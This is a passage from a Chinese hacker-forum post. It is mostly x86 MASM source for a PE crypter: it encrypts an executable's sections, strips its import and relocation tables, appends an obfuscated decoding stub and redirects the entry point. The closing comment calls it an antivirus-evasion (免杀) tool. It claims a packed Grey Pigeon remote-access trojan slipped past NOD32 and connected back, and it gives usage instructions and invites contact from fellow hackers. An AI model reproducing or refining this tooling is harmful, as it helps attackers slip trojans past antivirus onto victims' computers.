mov byte ptr [edi],0
dec esi
@@:
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @b
cmp al,9
je @b
mov edi,offset fname2
@@:
mov al,[esi]
cmp al,20h
je @f
cmp al,9
je @f
mov [edi],al
inc esi
inc edi
cmp al,0
je t9
jmp @b
@@:
mov byte ptr [edi],0
dec esi
@@:
inc esi
mov al,[esi]
cmp al,0
je t9
cmp al,20h
je @b
cmp al,9
je @b
mov edi,offset fname3
@@:
mov al,[esi]
cmp al,20h
je @f
cmp al,9
je @f
mov [edi],al
inc esi
inc edi
cmp al,0
je t9
jmp @b
@@:
mov byte ptr [edi],0
t9:
ret
trans endp
calc_checksum proc uses eax ebx ecx edi esi
mov ebx,0
lea esi,check1_start[ebx]
lea edi,check1_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
sub eax,ecx
inc esi
cmp esi,edi
jb @b
mov dword ptr check1_sum,eax
lea esi,check2_start[ebx]
lea edi,check2_end[ebx]
mov eax,0
mov ecx,0
@@:
mov cl,[esi]
add eax,ecx
inc esi
cmp esi,edi
jb @b
mov dword ptr check2_sum,eax
ret
calc_checksum endp
start:
; int 3
jmp st1
invoke LoadLibrary,addr shell32
invoke GetProcAddress,eax,800000e9h
; invoke VirtualAlloc,0h,10000h,MEM_RESERVE,PAGE_READWRITE
; invoke VirtualQuery,eax,addr mbi,sizeof MEMORY_BASIC_INFORMATION
; invoke VirtualAlloc,0h,10000h,MEM_COMMIT,PAGE_READWRITE
; invoke VirtualAlloc,0h,10000h,MEM_COMMIT,PAGE_READWRITE
; invoke VirtualProtect,3e0000h,10,PAGE_READONLY,addr temp1
mov esi,400000h
@@:
invoke VirtualQuery,esi,addr mbi,sizeof MEMORY_BASIC_INFORMATION
; cmp dword ptr mbi[10h],10000h
; je @f
mov esi,dword ptr mbi[0] ;MEMORY_BASIC_INFORMATION.BaseAddress]
add esi,dword ptr mbi[0ch] ;MEMORY_BASIC_INFORMATION.RegionSize]
cmp eax,0
jne @b
@@:
mov eax,dword ptr mbi[0]
; invoke VirtualAlloc,eax,10h,MEM_COMMIT,PAGE_READWRITE
cmp eax,0
jne @f
invoke VirtualQuery,3e0000h,addr mbi,sizeof MEMORY_BASIC_INFORMATION
; invoke VirtualAlloc,0,10h,MEM_COMMIT,PAGE_READWRITE
invoke VirtualQuery,3e0000h,addr mbi,sizeof MEMORY_BASIC_INFORMATION
@@:
st1:
invoke VirtualProtect,addr entry,key_size,PAGE_READWRITE,addr temp1
invoke GetTickCount
push eax
invoke GetTickCount
pop edx
mul edx
mov dword ptr dc_edit+1,eax
mov dword ptr ec_edit+1,eax
call calc_checksum
invoke GetTickCount
push eax
invoke GetTickCount
pop edx
mul edx
mov decode_key,eax
not eax
mov rnd,eax
mov esi,offset _ok
mov edi,offset __ok
mov eax,decode_key
@@:
cmp esi,edi
jae @f
xor [esi],al
inc eax
ror eax,7
inc esi
jmp @b
@@:
invoke GetCommandLine
call trans ;分解命令行
invoke CreateFile,addr fname1,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0
cmp eax,INVALID_HANDLE_VALUE
je error1
mov hfile1,eax
invoke CreateFile,addr fname2,GENERIC_WRITE,0,0,CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,0
cmp eax,INVALID_HANDLE_VALUE
je error3
mov hfile3,eax
invoke GetFileSize,hfile1,0
mov fsize1,eax
invoke VirtualAlloc,0,fsize1,MEM_COMMIT,PAGE_READWRITE
mov pt1,eax
invoke ReadFile,hfile1,pt1,fsize1,addr temp1,0
mov ebx,pt1
mov esi,[ebx+3ch]
cmp flag_clear_boundimport,0
je @f
lea eax,[ebx+esi+0d0h]
mov dword ptr [eax],0
mov dword ptr [eax+4],0
@@:
cmp flag_clear_load_config,0
je @f
lea eax,[ebx+esi+0c8h]
mov dword ptr [eax],0
mov dword ptr [eax+4],0
@@:
mov eax,[ebx+esi+34h]
mov image_base,eax
push esi
lea esi,[ebx+esi+78h]
mov edi,offset rva_table
mov ecx,80h
call move_memory
pop esi
cmp flag_add_section,0
je @f
add word ptr [ebx+esi+6],1
@@:
mov eax,0
xchg eax,[ebx+esi+80h]
mov iat_offs,eax
mov eax,0
xchg eax,[ebx+esi+84h]
mov iat_size,eax
mov eax,0
xchg eax,[ebx+esi+0a0h]
mov reloc_offs,eax
mov eax,0
xchg eax,[ebx+esi+0a4h]
mov reloc_size,eax
lea edi,[esi+0f8h]
movzx eax,word ptr [ebx+esi+6]
mov temp1,eax
st2:
dec temp1
jz st3
jmp @f
cmp dword ptr [ebx+edi+0ch],0 ;;;;;;
je st3
cmp dword ptr [ebx+edi+08h],0 ;;;;;;
je st3
@@:
jmp st24
mov eax,dword ptr [ebx+esi+0a8h]
cmp eax,0
je @f
add eax,dword ptr [ebx+esi+0ach]
cmp eax,dword ptr [ebx+edi+0ch]
jb @f
mov eax,dword ptr [ebx+edi+0ch]
add eax,dword ptr [ebx+edi+8]
cmp eax,dword ptr [ebx+esi+0a8h]
ja st25
@@:
mov eax,dword ptr [ebx+esi+88h]
cmp eax,0
je @f
add eax,dword ptr [ebx+esi+8ch]
cmp eax,dword ptr [ebx+edi+0ch]
jb @f
mov eax,dword ptr [ebx+edi+0ch]
add eax,dword ptr [ebx+edi+8]
cmp eax,dword ptr [ebx+esi+88h]
ja st25
@@:
mov eax,dword ptr [ebx+esi+0c0h]
cmp eax,0
je @f
add eax,dword ptr [ebx+esi+0c4h]
cmp eax,dword ptr [ebx+edi+0ch]
jb @f
mov eax,dword ptr [ebx+edi+0ch]
add eax,dword ptr [ebx+edi+8]
cmp eax,dword ptr [ebx+esi+0c0h]
ja st25
@@:
st24:
mov eax,[ebx+edi+8]
cmp eax,[ebx+edi+10h]
jbe @f
mov eax,[ebx+edi+10h]
@@:
mov ecx,[ebx+edi+14h]
;;;;;;add ecx,ebx
mov edx,[ebx+edi+0ch]
sub ecx,edx ;
invoke encode,edx,eax,ebx,ecx
st25:
add edi,28h
jmp st2
st3:
push edi
lea eax,[esi+0f8h]
sub edi,eax
mov edx,0
mov eax,edi
mov edi,28h
div edi
mov number_of_section,eax
pop edi
cmp flag_add_section,0
jne st6
mov eax,fsize1
sub eax,[ebx+edi+14h]
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
push eax
add eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+08h],eax
mov [ebx+edi+10h],eax
or dword ptr [ebx+edi+24h],0a0000020h ;mov dword ptr [ebx+edi+24h],0e0000040h
pop ecx
mov eax,[ebx+edi+0ch]
add eax,ecx
add eax,offset entry
sub eax,offset entry
xchg [ebx+esi+28h],eax
mov shell_eip,eax
jmp st7
st6:
mov eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+8],eax
sub edi,28h
mov eax,[ebx+edi+0ch]
add eax,[ebx+edi+8]
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
add edi,28h
mov [ebx+edi+0ch],eax
mov eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+10h],eax
mov eax,fsize1
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+edi+14h],eax
mov dword ptr [ebx+edi+24h],0e0000020h
mov eax,[ebx+edi+0ch]
add eax,offset entry
sub eax,offset entry
xchg [ebx+esi+28h],eax
mov shell_eip,eax
st7:
mov eax,[ebx+edi+0ch]
add eax,[ebx+edi+8]
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
mov [ebx+esi+50h],eax
mov eax,decode_key
xor shell_eip,eax
lea esi,entry00
mov ecx,__ok - entry00
@@:
not byte ptr [esi]
inc esi
loop @b
mov flag_reentry,0
invoke WriteFile,hfile3,pt1,fsize1,addr temp1,0
cmp flag_add_section,0
jne st75
mov eax,fsize1
sub eax,[ebx+edi+14h]
mov ecx,1000h
sub ecx,eax
jns st71
@@:
add ecx,1000h
js @b
st71:
mov eax,ecx
jmp st8
st75:
mov eax,fsize1
test eax,00000fffh
je @f
add eax,1000h
@@:
and eax,0fffff000h
sub eax,fsize1
st8:
lea ecx,_fill
invoke WriteFile,hfile3,ecx,eax,addr temp1,0
mov eax,key_size
test eax,00000fffh
jz @f
add eax,1000h
@@:
and eax,0fffff000h
invoke WriteFile,hfile3,addr entry,eax,addr temp1,0
invoke CloseHandle,hfile1
invoke CloseHandle,hfile3
invoke VirtualFree,pt1,0,MEM_RELEASE
invoke CreateFile,addr fname2,GENERIC_READ + GENERIC_WRITE,0,0,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0
cmp eax,INVALID_HANDLE_VALUE
je error3
mov hfile1,eax
invoke GetFileSize,hfile1,0
mov fsize1,eax
invoke VirtualAlloc,0,fsize1,MEM_COMMIT,PAGE_READWRITE
mov pt1,eax
invoke ReadFile,hfile1,pt1,fsize1,addr temp1,0
mov ecx,fsize1
mov edi,pt1
uu1:
cmp ecx,8
jb nofound
cmp dword ptr [edi],'LiNr' ;'rNiL'
jne uu2
cmp dword ptr [edi+4],'VoTa' ;'aToV'
je found
uu2:
inc edi
loop uu1
jmp nofound
found:
add edi,8
sub edi,pt1
mov ebx,pt1
mov esi,[ebx+3ch]
movzx ecx,word ptr [ebx+esi+6]
mov eax,[ebx+esi+74h]
shl eax,3
lea edx,[ebx+esi+78h]
add edx,eax
uu3:
cmp dword ptr [edx+14h],edi
ja s_nt
mov eax,[edx+8]
add eax,[edx+14h]
cmp eax,edi
jbe s_nt
mov eax,edi
sub eax,[edx+14h]
add eax,[edx+0ch]
mov [ebx+esi+80h],eax
mov dword ptr [ebx+esi+84h],14h ;size1+size2+size3+size4
lea ecx,[eax+size1]
mov [ebx+edi+0ch],ecx
lea ecx,[eax+size1+size2]
mov [ebx+edi+size1+size2+size3],ecx
lea ecx,[eax+size1+size2+size3]
mov [ebx+edi+10h],ecx
jmp found1
s_nt:
add edx,28h
loop uu3
jmp nofound
found1:
invoke SetFilePointer,hfile1,0,0,FILE_BEGIN
invoke WriteFile,hfile1,pt1,fsize1,addr temp1,0
nofound:
invoke CloseHandle,hfile1
invoke VirtualFree,pt1,0,MEM_RELEASE
error1:
error2:
error3:
exit0:
invoke ExitProcess,0
_fill db 1000h dup (0)
end start
-----------------------------------
程序很简单把,你那么聪明,肯定看懂了,这只是一个小小的免杀工具模型,可以使用呵,我试验成功,不去特征的黑防鸽子免杀后,直接过NOD32,上线成功,怎么样。
注意,编译后,程序使用方法:shell.exe <input.exe> <output.exe>
如:shell.exe server.exe miansha.exe
明白??不明白的就是White口乞!!
-----------------------------------
PS:想交个朋友的回帖时打上QQ或邮箱,愿交天下志同道合的黑友。
不知道为什么我不能上传ZIP,RAR附件??郁闷,版主或管理员照顾一下我,让我能传附件好不好??
